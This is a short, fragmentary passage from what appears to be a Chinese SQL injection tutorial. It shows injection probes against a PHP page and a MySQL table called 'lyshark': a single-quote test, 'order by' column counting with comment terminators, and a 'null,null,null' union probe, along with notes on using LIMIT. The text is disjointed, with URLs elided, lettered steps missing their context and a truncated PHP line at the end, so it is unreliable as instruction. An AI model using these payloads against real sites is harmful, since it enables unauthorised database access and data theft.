id=1'
执行的SQL语句: select * from lyshark where id=1'
提交AND判断: 也可以使用and语句来判断是否存在注入....id=1 order by 4 #
b.上面查询没有显示任何结果,我们查询4个字段无返回值,说面该表小于4个字段,我们继续使用3测试,此时返回了结果.
index.php?...null,null,null
第二种:通过limit语句,limit在mysql中是用来分页的,通过他可以从查询出来的数据中获取我们想要的数据.
index.php?...id=1' and 1=1 order by 6 --+
b.上面查询没有显示任何结果,我们查询6个字段无返回值,说面该表小于6个字段,我们继续使用5测试,此时返回了结果.
index.php?...php echo ' 后端执行SQL语句: ' . $sql; ?